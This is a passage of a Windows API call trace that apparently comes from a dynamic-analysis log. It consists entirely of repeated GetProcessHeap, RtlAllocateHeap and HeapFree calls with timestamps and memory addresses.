[0110.730] GetProcessHeap () returned 0xe30000 [0110.730] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.731] GetProcessHeap () returned 0xe30000 [0110.731] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.732] GetProcessHeap () returned 0xe30000 [0110.732] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0110.733] GetProcessHeap () returned 0xe30000 [0110.733] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.734] GetProcessHeap () returned 0xe30000 [0110.734] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.734] GetProcessHeap () returned 0xe30000 [0110.734] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.734] GetProcessHeap () returned 0xe30000 [0110.734] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.734] GetProcessHeap () returned 0xe30000 [0110.734] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0110.734] GetProcessHeap () returned 0xe30000 [0110.734] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0110.734] GetProcessHeap () returned 0xe30000 [0110.734] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.735] GetProcessHeap () returned 0xe30000 [0110.735] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.735] GetProcessHeap () returned 0xe30000 [0110.735] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.735] GetProcessHeap () returned 0xe30000 [0110.735] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.735] GetProcessHeap () returned 0xe30000 [0110.735] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0110.735] GetProcessHeap () returned 0xe30000 [0110.735] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0110.735] GetProcessHeap () returned 0xe30000 [0110.735] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.735] GetProcessHeap () returned 0xe30000 [0110.736] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.736] GetProcessHeap () returned 0xe30000 [0110.736] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.737] GetProcessHeap () returned 0xe30000 [0110.737] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.737] GetProcessHeap () returned 0xe30000 [0110.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.738] GetProcessHeap () returned 0xe30000 [0110.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.738] GetProcessHeap () returned 0xe30000 [0110.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0110.739] GetProcessHeap () returned 0xe30000 [0110.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0110.740] GetProcessHeap () returned 0xe30000 [0110.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0110.740] GetProcessHeap () returned 0xe30000 